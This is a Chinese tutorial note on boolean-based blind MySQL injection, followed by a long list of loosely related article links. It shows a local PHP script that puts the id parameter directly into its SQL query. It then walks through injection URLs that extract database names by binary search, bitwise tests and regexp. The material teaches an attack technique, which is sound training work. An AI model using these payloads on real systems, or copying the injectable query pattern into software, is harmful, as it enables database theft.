miss枫
miss枫

【20】WEB安全学习----MySQL注入-5(布尔型盲注)

布尔型盲注例子演示:

本次代码不输出具体的查询记录结果,如果存在ID值则输出一个状态,不存在ID值则输出另一个状态,也不会输出SQL报错状态,为布尔型盲注。

connect('localhost','root','root');
    if($mysqli->connect_errno){
        die('连接数据库失败:'.$mysqli->connect_error);
    }
    $mysqli->select_db('user');
    if($mysqli->errno){
        die('打开数据库失败:'.$mysqli->error);
    }
    $mysqli->set_charset('utf8');
    $sql="SELECT username,passwd FROM users WHERE id={$id} limit 0,1";  //添加了limit语句
    $result=$mysqli->query($sql);
    if(!$result){
        //die('执行SQL语句失败:'.$mysqli->error);
    }else if($result->num_rows==0){
        echo '抱歉!不存在此记录';
    }else {
        echo '存在此记录';
    }

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第1张图片

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第2张图片

注入步骤

判断注入点:

判断注入点同样可以进行运算符操作,查看是否执行了运算

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第3张图片

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第4张图片

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第5张图片

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第6张图片

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第7张图片

判断字段数:

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第8张图片

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第9张图片

逻辑判断注入:

因为不返回查询结果信息,所以不能直接进行查询,但是可以通过条件语句进行逻辑判断猜解。

查看当前数据库版本:通过逻辑比较得知,数据库版本为5

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第10张图片

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第11张图片

二分搜索法进行猜解

猜解information_schema.schemata表里第二行记录的第一个字符为’f

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第12张图片

http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>64,1,0)%23 存在此记录
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>128,1,0)%23 不存在此记录
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>96,1,0)%23 存在此记录
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>112,1,0)%23 不存在此记录
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>104,1,0)%23 不存在此记录
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>100,1,0)%23 存在此记录
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>102,1,0)%23 不存在此记录
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1))>101,1,0)%23 存在此记录
x>101 and x<102 所以x=102

102对应的正是字符f

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第13张图片

但是,不知道字段值什么时候结束,所以首先需要取当前字段值的长度。

http://localhost/index.php?id=1 and if(length((select schema_name from information_schema.schemata limit 1,1))=4,1,0)%23 存在此记录

按位比较法进行猜解

http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 64,1,0)%23 存在此记录 1
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 32,1,0)%23 存在此记录 1
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 16,1,0)%23 不存在此记录 0
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 8,1,0)%23 不存在此记录 0
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 4,1,0)%23 存在此记录 1
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 2,1,0)%23 存在此记录 1
http://localhost/index.php?id=1 and if(ord(mid((select schema_name from information_schema.schemata limit 1,1),1,1)) %26 1,1,0)%23 不存在此记录 0
1100110转换到十进制为102

102对应的正是字符f

【20】WEB安全学习----MySQL注入-5(布尔型盲注)_第14张图片

正则表达式法进行猜解

http://localhost/index.php?id=1 and if((select schema_name from information_schema.schemata limit 1,1) regexp '^f',1,0)%23 是否以字符f开头  存在此记录
http://localhost/index.php?id=1 and if(mid((select schema_name from information_schema.schemata limit 1,1),1,1) regexp '[a-g]',1,0)%23 第一个字符是否在a-g中
......以此类推

 

 

 

 

你可能感兴趣的:(WEB安全学习笔记)

  • Web 学习笔记 - 网络安全 网络安全Max 前端笔记
    前言作为前端开发者,了解一点Web安全方面的基本知识是有很必要的,未必就要深入理解。本文主要介绍常见的网络攻击类型,不作深入探讨。正文网络攻击的形式种类繁多,从简单的网站敏感文件扫描、弱口令暴力破解,到SQL注入,再到复杂的网络劫持等,种类万千。本文只介绍以下两种攻击:XSS攻击CSRF攻击如果你对其他更高大上的网络攻击有兴趣,可以点击这里:Web安全学习笔记-高级网络攻击。XSS攻击XSS,跨站
  • web安全学习笔记(1) 头发的天敌是代码 web安全学习笔记web安全学习笔记
    一、网络安全分支1.web安全——网站2.二进制安全物联网安全工控安全二、网站是如何搭建起来的1.服务器服务器与我们的家庭使用电脑有什么区别?①没有显卡②CPU+内存不同于家庭电脑2.操作系统家庭系统:WindowsXPWindows7Windows8Windows9Windows10Windows11服务器操作系统:Windows2000Windows2003Windows2008Windows
  • web安全学习笔记【05】——反弹Shell、正反向连接 Sarahie 学习笔记web安全linux学习笔记
    思维导图#知识点:1、Web常规-系统&中间件&数据库&源码等2、Web其他-前后端&软件&Docker&分配站等3、Web拓展-CDN&WAF&OSS&反向&负载均衡等-----------------------------------1、APP架构-封装&原生态&H5&flutter等2、小程序架构-Web&H5&JS&VUE框架等------------------------------
  • web安全学习笔记【10】——数据包分析 Sarahie 学习笔记web安全学习笔记
    基础[1][2][3][4]入门-HTTP数据包&Postman构造&请求方法&请求头修改&状态码判断[5][6][7]#知识点:1、Web常规-系统&中间件&数据库&源码等2、Web其他-前后端&软件&Docker&分配站等3、Web拓展-CDN&WAF&OSS&反向&负载均衡等-----------------------------------1、APP架构-封装&原生态&H5&flutte
  • web安全学习笔记【08】——算法1 Sarahie 学习笔记学习web安全笔记
    思维导图在最后#知识点:1、Web常规-系统&中间件&数据库&源码等2、Web其他-前后端&软件&Docker&分配站等3、Web拓展-CDN&WAF&OSS&反向&负载均衡等-----------------------------------1、APP架构-封装&原生态&H5&flutter等2、小程序架构-Web&H5&JS&VUE框架等---------------------------
  • WEB安全学习笔记 小陈要努力学 phpasp.nethtml
    基础入门1.基础入门——基础概念域名什么是域名域名(英语:DomainName),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置)由于IP地址具有不方便记忆并且不能显示地址组织的名称和性质等缺点,人们设计出了域名,并通过网域名称系统(DNS,DomainNameSystem)来将域名和IP地址相互映射,使人
  • web安全学习笔记【09】——算法2 Sarahie 学习笔记学习web安全
    基础[1]入门-算法逆向&散列对称非对称&JS源码逆向&AES&DES&RSA&SHA#知识点:1、Web常规-系统&中间件&数据库&源码等2、Web其他-前后端&软件&Docker&分配站等3、Web拓展-CDN&WAF&OSS&反向&负载均衡等-----------------------------------1、APP架构-封装&原生态&H5&flutter等2、小程序架构-Web&H5&
  • web安全学习笔记【06】——http\https抓包 Sarahie 学习笔记httpweb安全学习
    思维导图放最后#知识点:1、Web常规-系统&中间件&数据库&源码等2、Web其他-前后端&软件&Docker&分配站等3、Web拓展-CDN&WAF&OSS&反向&负载均衡等-----------------------------------1、APP架构-封装&原生态&H5&flutter等2、小程序架构-Web&H5&JS&VUE框架等---------------------------
  • web安全学习笔记【07】——非http\https抓包 Sarahie 学习笔记web安全学习
    #知识点:1、Web常规-系统&中间件&数据库&源码等2、Web其他-前后端&软件&Docker&分配站等3、Web拓展-CDN&WAF&OSS&反向&负载均衡等-----------------------------------1、APP架构-封装&原生态&H5&flutter等2、小程序架构-Web&H5&JS&VUE框架等----------------------------------
  • Web安全学习资料(收藏) Rnan-prince 网络安全web渗透测试安全web
    1、Web安全学习笔记网址:Web安全学习笔记—Web安全学习笔记1.0文档2、条目详情-FreeBuf网络安全行业门户https://wiki.freebuf.com/detail?wiki=19&post=2749603、视频学习笔记·语雀视频学习笔记·语雀4、渗透测试体系化学习笔记-随笔分类-九~月-博客园渗透测试体系化学习笔记-随笔分类-九~月-博客园5、【小迪安全】视频2021最新web
  • 这份网络安全入门笔记(共327页),助你步入安全门槛 程序员小芽 安全web安全笔记
    前言随着Web技术发展越来越成熟,而非Web服务越来越少的暴露在互联网上,现在互联网安全主要指的是Web安全。为了自身不“裸奔”在大数据里,渐渐开始学习Web安全,在学习Web安全的过程中,发现很大一部分知识点都相对零散,如果没有相对清晰的脉络作为参考,会给学习带来一些不必要的负担。于是之后就把一些知识、想法整理记录下来,最后形成了这份《Web安全学习笔记》。这份文档共11个章节327页,对网络协
  • 【精选】2023网络安全学习路线 非常详细 推荐学习 Python栈机 web安全学习安全
    关键词:网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线分享2套零基础、进阶学习网络安全/渗透测试教程第一套是Web安全学习笔记,共430页12个章节。该笔记详细介绍了计算机网络协议、信息收集、常见漏洞、内网渗透、御用技术等等,全文全面成体系,通俗易懂,涵盖了零基础学员从入门到进阶需要掌握的核心知识点,实操性极强,感兴趣的朋友可以看一下。第二套是web安全零基础学习视频教程首先咱们聊聊,
  • Web安全学习笔记 Ekolia
    之前做项目写的那叫一个随意。。由于都是小项目和练手demo,完全没有管过安全相关方面的知识。。回头重新总结一下吧目前比较常见的安全问题大概有这几种:XSSCrossSiteScript跨站脚本攻击CSRFCross-siterequestforgery跨站请求伪造SQL注入DDOSDistributedDenialofService分布式拒绝服务比较少见的,还是了解一下的:iframe风险上传漏洞
  • 2023网络安全学习路线 非常详细 推荐学习 万天峰 网络安全安全web安全web安全学习安全
    关键词:网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线分享2套零基础、进阶学习网络安全/渗透测试教程点击此处即可获得网络安全教程第一套是Web安全学习笔记,共430页12个章节。该笔记详细介绍了计算机网络协议、信息收集、常见漏洞、内网渗透、御用技术等等,全文全面成体系,通俗易懂,涵盖了零基础学员从入门到进阶需要掌握的核心知识点,实操性极强,感兴趣的朋友可以看一下。第二套是web安全零基
  • Web安全入门笔记(共327页),快速入门网络安全(黑客) IT老涵 web安全笔记安全
    前言随着Web技术发展越来越成熟,而非Web服务越来越少的暴露在互联网上,现在互联网安全主要指的是Web安全。为了自身不“裸奔”在大数据里,渐渐开始学习Web安全,在学习Web安全的过程中,发现很大一部分知识点都相对零散,如果没有相对清晰的脉络作为参考,会给学习带来一些不必要的负担。于是之后就把一些知识、想法整理记录下来,最后形成了这份《Web安全学习笔记》。这份文档共11个章节327页,对网络协
  • web安全自学笔记 网络安全-生 零基础学网络安全学习路线计算机网络web安全网络安全网络安全技能树编程
    Web安全方面的基本知识是有很必要的,未必就要深入理解。本文主要介绍常见的网络攻击类型,不作深入探讨。正文网络攻击的形式种类繁多,从简单的网站敏感文件扫描、弱口令暴力破解,到SQL注入,再到复杂的网络劫持等,种类万千。本文只介绍以下两种攻击:XSS攻击CSRF攻击如果你对其他更高大上的网络攻击有兴趣,可以点击这里:Web安全学习笔记-高级网络攻击。XSS攻击XSS,跨站脚本攻击(CrossSite
  • Web安全学习笔记二 计算机网络与协议 _abcdef Web安全网络基础TCP/UDP协议包HTTP协议簇路由算法/域名系统
    文章目录计算机网络协议1.1网络基础1.1.1计算机通信网的组成1.1.2通信协议1.1.3OSI七层模型1.1.3.1物理层1.1.3.2数据链路层1.1.3.3网络层1.1.3.4传输层1.1.3.5会话层1.1.3.6表示层1.1.3.7应用层1.1.3.8总结1.2UDP协议1.2.1主要特点1.2.2UDP数据格式与包结构1.3TCP协议1.3.1简介1.3.2TCP包结构1.3.3三次
  • web安全学习笔记--基础入门 光迹ovo web安全
    一、名词1.DNS(域名系统):将域名和IP地址相互映射的一个分布式数据库,便于用户访问;UDP/TCP端口为53,利用cmd中ping命令可以查看域名所对应的ip号2.CDN(内容分发网络):将网络的流量尽可能均匀分配到几个能完成相同任务的服务器或网络节点上,由此来避免部分网络节点过载3.hosts文件:将ip与域名建立关联数据库,登录网页时若设置了关系,计算机将先从此文件中将网址提交DNS域名
  • 零基础Web安全学习笔记 网络安全进阶 渗透测试web安全渗透测试网络安全学习安全
    内容索引:1.序章1.1.Web技术演化1.2.网络攻防技术演化1.3.网络安全观1.4.法律与法规2.计算机网络与协议2.1.网络基础2.2.UDP协议2.3.TCP协议2.4.DHCP协议2.5.路由算法2.6.域名系统2.7.HTTP协议簇2.8.邮件协议族2.9.SSL/TLS2.10.IPsec2.11.Wi-Fi3.信息收集3.1.网络入口/信息3.2.域名信息3.3.端口信息3.4.
  • Web安全学习笔记 SQL注入下 maoyin
    Web安全学习笔记SQL注入下繁枝插云欣——ICML8SQL注入小技巧CheatSheet预编译参考文章一点心得一.SQL注入小技巧1.宽字节注入一般程序员用gbk编码做开发的时候,会用setnames'gbk'来设定,这句话等同于setcharacter_set_
  • web安全学习笔记(5) 暴走の小熊猫 web安全学习笔记
    服务器远程管理一、远程管理类型Windows远程管理有2种类型:1、远程桌面(圆形)2、telnet(命令行)二、远程桌面拓扑图步骤:1、首先将配置网络,并实现客户机与服务器可以互通2、服务器开启允许被远程控制:桌面右键属性–远程设置–选择允许–确定3、客户机上:开始--运行--输入mstsc打开远程连接工具4、在mstsc工具上输入服务器的IP并点击确定5、输入服务器的账号和密码注意:如使用非管
  • web安全学习笔记(一) OWASPBWA--靶机搭建 qycc3391 web安全学习笔记安全web
    为了学习web安全,需要搭建一个用来攻击的靶机,OWASP,OpenWebApplicationSecurityProject,提供了许多用于学习安全学习的项目。这里使用TheBrokenWebApplications(BWA)Project,提供一个虚拟机的克隆,包含了含有漏洞的网站,可以使用vmwareworkstation打开。此项目的优点是,直接提供了虚拟机的克隆,可以直接打开,无需复杂的
  • web安全学习笔记(八) XSS之cookie劫持 qycc3391 web安全学习笔记xsscookie安全漏洞session
    上一文中提到XSS的分类,本文将演示如何通过XSS进行cookie劫持,并且伪装登录。再cookie劫持中,有三种身份,分别是服务器,普通用户以及攻击者。这里使用本机和两台台虚拟机完成这项工作。基本思路如图所示:首先,攻击者发现某个网站存在XSS漏洞,于是编写恶意代码。当用户访问带有恶意代码的网站时,会将通过恶意代码,将cookie发送给攻击者。当攻击者获取cookie后,便可以使用cookie进
  • web安全学习笔记(七) XSS(Cross-site scripting)跨站脚本漏洞 qycc3391 web安全学习笔记
    1.XSS原理解析HTML中,有着标签,用于定义客户端脚本。在与之间输入代码,即可实现一些特殊效果。例如,新建两个文件,xxstest.html和PrintSrc.php两个文件:alert(/xss/)时,就会触发XSS攻击:为什么网页不会像abd那样打印alert(/xss/),而是弹出了提示框呢?这是因为alert(/xss/)被包含在script标签中,标签中的内容被解析了,这就是XSS漏
  • web安全学习笔记(九)CSRF(Cross-Site Request Forgery) 跨站请求伪造 qycc3391 web安全学习笔记
    0.前言CRSF是建立在会话之上的,听起来非常像XSS跨站脚本攻击,但是实际上攻击方式完全不同。之前在写XSS时,提到很多网站会使用cookie来保存用户登录的信息,例如昨天晚上我使用完CSDN后,关闭浏览器,关闭电脑,今天打开CSDN时,虽然没有填写账户和密码,也会自动登陆。那么CRSF可以做到什么呢?比如A登陆了网上银行,正在准备进行一个操作,然而有攻击者给他发送了一个链接,当A点击这条URL
  • web安全学习笔记之-脚本安全 sailtoyouSCU web安全
    浏览器安全浏览器很强大但是也不是那么神秘,本质上就是一个客户端或者终端APP。因为实现了一系列标准的协议文件,而拥有了这个特殊的地位。作为一名大公司里专职后台的同学,涉足前端工作较少,我们对浏览器的了解程度、对安全问题的重视还不够。以前了解的一些基本概念如跨域,今天总算知道为啥而来:同源策略浏览器判断同源的根据是:host、子域、端口、协议。这些因素里有一个不同就认为不同源对于js文件引入来说,文
  • web安全学习笔记之-认证和会话管理-访问控制 sailtoyouSCU web安全
    密码是验证主人最简单常用的手段网站要避免存密码的明文,CSDN被拖裤后,密码是明文的非常悲剧。密码必须用md5或者sha哈希后存起来,验证密码也是比较哈希值就可以了。md5是不可逆的。但是彩虹表这种穷举法已经用于MD5的破解,但是只要网站在计算哈希的时候简单加一个私密字符串就可以对彩虹表取明文带来难度支付网站除了密码,还用了多中手段去认证:动态口令、数字证书、第三方等。黑客很难取得所有渠道的认证方
  • web安全学习笔记之-文件上传漏洞 sailtoyouSCU web安全
    文件上传在web服务里非常普遍上传附件、图片、文本都很多啦。上传文件漏洞指的是上传web脚本且能被web服务器解析上传文件必须能被解释执行且在web容器能执行的路径里服务器如果仅仅根据文件名来判断文件的类型,则很容易利用0截断功能绕过例如xxx.php伪造成xxx.php\0.jpg一般php的文件名处理结果是.jpg除了看后缀还要看数据的head内容是否符合。当然文件头也可以伪造。但是只要执行的
  • web安全学习笔记-加密算法 sailtoyouSCU web安全
    加密算法分两类1、分组加密算法DES3-DESIDEAAESBLOWFISH2、流加密算法RC4ORYXSEALhttp://www.cnblogs.com/happyhippy/archive/2006/12/23/601353.html分组加密也分四种模式(ECB、CBC、CFB、OFB)对于这几种模式的区别在于衡量他们在明文攻击、并行计算、误差传递等指标的表现对流密码加密的攻击流密码主要原理
  • web安全学习笔记之-注入攻击 sailtoyouSCU web安全
    前面有很多攻击细节都是讲html、浏览器、javascript的这一章节比较偏后端。注入攻击的本质就是用户输入的数据当作代码去执行了。1、用户能够控制输入2、程序要执行的代码拼接了用户的数据sql注入:例如要执行用户输入的查询条件xxxxselect*fromtableawherea=xxxx;但是如果输入的xxxx是恶意的,变成了xxxx;droptabletablea;那么执行代码拼接了用户的
  • java观察者模式 3213213333332132 java设计模式游戏观察者模式
    观察者模式——顾名思义,就是一个对象观察另一个对象,当被观察的对象发生变化时,观察者也会跟着变化。 在日常中,我们配java环境变量时,设置一个JAVAHOME变量,这就是被观察者,使用了JAVAHOME变量的对象都是观察者,一旦JAVAHOME的路径改动,其他的也会跟着改动。 这样的例子很多,我想用小时候玩的老鹰捉小鸡游戏来简单的描绘观察者模式。 老鹰会变成观察者,母鸡和小鸡是
  • TFS RESTful API 模拟上传测试 ronin47
           TFS RESTful API 模拟上传测试。    细节参看这里:https://github.com/alibaba/nginx-tfs/blob/master/TFS_RESTful_API.markdown 模拟POST上传一个图片: curl --data-binary @/opt/tfs.png http
  • PHP常用设计模式单例, 工厂, 观察者, 责任链, 装饰, 策略,适配,桥接模式 dcj3sjt126com 设计模式PHP
    // 多态, 在JAVA中是这样用的, 其实在PHP当中可以自然消除, 因为参数是动态的, 你传什么过来都可以, 不限制类型, 直接调用类的方法 abstract class Tiger { public abstract function climb(); } class XTiger extends Tiger { public function climb()
  • hibernate 171815164 Hibernate
    main,save Configuration conf =new Configuration().configure(); SessionFactory sf=conf.buildSessionFactory(); Session sess=sf.openSession(); Transaction tx=sess.beginTransaction(); News a=new
  • Ant实例分析 g21121 ant
            下面是一个Ant构建文件的实例,通过这个实例我们可以很清楚的理顺构建一个项目的顺序及依赖关系,从而编写出更加合理的构建文件。           下面是build.xml的代码: <?xml version="1
  • [简单]工作记录_接口返回405原因 53873039oycg 工作
             最近调接口时候一直报错,错误信息是:       responseCode:405 responseMsg:Method Not Allowed        接口请求方式Post.
  • 关于java.lang.ClassNotFoundException 和 java.lang.NoClassDefFoundError 的区别 程序员是怎么炼成的
       真正完成类的加载工作是通过调用 defineClass来实现的;  而启动类的加载过程是通过调用 loadClass来实现的;  就是类加载器分为加载和定义   protected Class<?> findClass(String name) throws ClassNotFoundExcept
  • JDBC学习笔记-JDBC详细的操作流程 aijuans jdbc
    所有的JDBC应用程序都具有下面的基本流程:  1、加载数据库驱动并建立到数据库的连接。  2、执行SQL语句。  3、处理结果。  4、从数据库断开连接释放资源。 下面我们就来仔细看一看每一个步骤: 其实按照上面所说每个阶段都可得单独拿出来写成一个独立的类方法文件。共别的应用来调用。 1、加载数据库驱动并建立到数据库的连接:   Html代码  St
  • rome创建rss antonyup_2006 tomcatcmsxmlstrutsOpera
    引用 1.RSS标准 RSS标准比较混乱,主要有以下3个系列 RSS 0.9x / 2.0 : RSS技术诞生于1999年的网景公司(Netscape),其发布了一个0.9版本的规范。2001年,RSS技术标准的发展工作被Userland Software公司的戴夫 温那(Dave Winer)所接手。陆续发布了0.9x的系列版本。当W3C小组发布RSS 1.0后,Dave W
  • html表格和表单基础 百合不是茶 html表格表单meta锚点
    第一次用html来写东西,感觉压力山大,每次看见别人发的都是比较牛逼的 再看看自己什么都还不会,   html是一种标记语言,其实很简单都是固定的格式   _----------------------------------------表格和表单 表格是html的重要组成部分,表格用在body里面的 主要用法如下; <table> &
  • ibatis如何传入完整的sql语句 bijian1013 javasqlibatis
            ibatis如何传入完整的sql语句?进一步说,String str ="select * from test_table",我想把str传入ibatis中执行,是传递整条sql语句。         解决办法: <
  • 精通Oracle10编程SQL(14)开发动态SQL bijian1013 oracle数据库plsql
    /* *开发动态SQL */ --使用EXECUTE IMMEDIATE处理DDL操作 CREATE OR REPLACE PROCEDURE drop_table(table_name varchar2) is sql_statement varchar2(100); begin sql_statement:='DROP TABLE '||table_name;
  • 【Linux命令】Linux工作中常用命令 bit1129 linux命令
    不断的总结工作中常用的Linux命令   1.查看端口被哪个进程占用   通过这个命令可以得到占用8085端口的进程号,然后通过ps -ef|grep 进程号得到进程的详细信息   netstat -anp | grep 8085   察看进程ID对应的进程占用的端口号   netstat -anp | grep 进程ID &
  • 优秀网站和文档收集 白糖_ 网站
    集成 Flex, Spring, Hibernate 构建应用程序   性能测试工具-JMeter   Hmtl5-IOCN网站   Oracle精简版教程网站   鸟哥的linux私房菜   Jetty中文文档   50个jquery必备代码片段   swfobject.js检测flash版本号工具
  • angular.extend boyitech AngularJSangular.extendAngularJS API
    angular.extend 复制src对象中的属性去dst对象中. 支持多个src对象. 如果你不想改变一个对象,你可以把dst设为空对象{}: var object = angular.extend({}, object1, object2). 注意: angular.extend不支持递归复制. 使用方法: angular.extend(dst, src); 参数:
  • java-谷歌面试题-设计方便提取中数的数据结构 bylijinnan java
    网上找了一下这道题的解答,但都是提供思路,没有提供具体实现。其中使用大小堆这个思路看似简单,但实现起来要考虑很多。 以下分别用排序数组和大小堆来实现。 使用大小堆: import java.util.Arrays; public class MedianInHeap { /** * 题目:设计方便提取中数的数据结构 * 设计一个数据结构,其中包含两个函数,1.插
  • ajaxFileUpload 针对 ie jquery 1.7+不能使用问题修复版本 Chen.H ajaxFileUploadie6ie7ie8ie9
    jQuery.extend({ handleError: function( s, xhr, status, e ) { // If a local callback was specified, fire it if ( s.error ) { s.error.call( s.context || s, xhr, status, e ); }
  • [机器人制造原则]机器人的电池和存储器必须可以替换 comsci 制造
           机器人的身体随时随地可能被外来力量所破坏,但是如果机器人的存储器和电池可以更换,那么这个机器人的思维和记忆力就可以保存下来,即使身体受到伤害,在把存储器取下来安装到一个新的身体上之后,原有的性格和能力都可以继续维持.....        另外,如果一
  • Oracle Multitable INSERT 的用法 daizj oracle
    转载Oracle笔记-Multitable INSERT 的用法 http://blog.chinaunix.net/uid-8504518-id-3310531.html 一、Insert基础用法 语法:     Insert Into 表名 (字段1,字段2,字段3...)     Values (值1,
  • 专访黑客历史学家George Dyson datamachine on
    20世纪最具威力的两项发明——核弹和计算机出自同一时代、同一群年青人。可是,与大名鼎鼎的曼哈顿计划(第二次世界大战中美国原子弹研究计划)相 比,计算机的起源显得默默无闻。出身计算机世家的历史学家George Dyson在其新书《图灵大教堂》(Turing’s Cathedral)中讲述了阿兰·图灵、约翰·冯·诺依曼等一帮子天才小子创造计算机及预见计算机未来
  • 小学6年级英语单词背诵第一课 dcj3sjt126com englishword
    always 总是 rice 水稻,米饭 before 在...之前 live 生活,居住   usual 通常的 early 早的 begin 开始 month 月份   year 年 last 最后的 east 东方的 high 高的   far 远的 window 窗户 world 世界 than 比...更  
  • 在线IT教育和在线IT高端教育 dcj3sjt126com 教育
    codecademy  http://www.codecademy.com codeschool  https://www.codeschool.com teamtreehouse  http://teamtreehouse.com lynda http://www.lynda.com/ Coursera https://www.coursera.
  • Struts2 xml校验框架所定义的校验文件 蕃薯耀 Struts2 xml校验Struts2 xml校验框架Struts2校验
      >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月11日 15:54:59 星期六 http://fa
  • mac下安装rar和unrar命令 hanqunfeng mac
    1.下载:http://www.rarlab.com/download.htm 选择 RAR 5.21 for Mac OS X 2.解压下载后的文件 tar -zxvf rarosx-5.2.1.tar 3.cd rar sudo install -c -o $USER unrar /bin #输入当前用户登录密码 sudo install -c -o $USER rar
  • 三种将list转换为map的方法 jackyrong list
      在本文中,介绍三种将list转换为map的方法: 1) 传统方法 假设有某个类如下    class Movie { private Integer rank; private String description; public Movie(Integer rank, String des
  • 年轻程序员需要学习的5大经验 lampcy 工作PHP程序员
    在过去的7年半时间里,我带过的软件实习生超过一打,也看到过数以百计的学生和毕业生的档案。我发现很多事情他们都需要学习。或许你会说,我说的不就是某种特定的技术、算法、数学,或者其他特定形式的知识吗?没错,这的确是需要学习的,但却并不是最重要的事情。他们需要学习的最重要的东西是“自我规范”。这些规范就是:尽可能地写出最简洁的代码;如果代码后期会因为改动而变得凌乱不堪就得重构;尽量删除没用的代码,并添加
  • 评“女孩遭野蛮引产致终身不育 60万赔偿款1分未得”医腐深入骨髓 nannan408
    先来看南方网的一则报道: 再正常不过的结婚、生子,对于29岁的郑畅来说,却是一个永远也无法实现的梦想。从2010年到2015年,从24岁到29岁,一张张新旧不一的诊断书记录了她病情的同时,也清晰地记下了她人生的悲哀。   粗暴手术让人发寒   2010年7月,在酒店做服务员的郑畅发现自己怀孕了,可男朋友却联系不上。在没有和家人商量的情况下,她决定堕胎。   12月5日,
  • 使用jQuery为input输入框绑定回车键事件 VS 为a标签绑定click事件 Everyday都不同 jspinput回车键绑定clickenter
    假设如题所示的事件为同一个,必须先把该js函数抽离出来,该函数定义了监听的处理:   function search() { //监听函数略...... }   为input框绑定回车事件,当用户在文本框中输入搜索关键字时,按回车键,即可触发search():   //回车绑定 $(".search").keydown(fun
  • EXT学习记录 tntxia ext
      1. 准备   (1) 官网:http://www.sencha.com/   里面有源代码和API文档下载。   EXT的域名已经从www.extjs.com改成了www.sencha.com ,但extjs这个域名会自动转到sencha上。   (2)帮助文档:   想要查看EXT的官方文档的话,可以去这里h
  • mybatis3的mapper文件报Referenced file contains errors xingguangsixian mybatis
    最近使用mybatis.3.1.0时无意中碰到一个问题: The errors below were detected when validating the file "mybatis-3-mapper.dtd" via the file "account-mapper.xml". In most cases these errors can be d
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他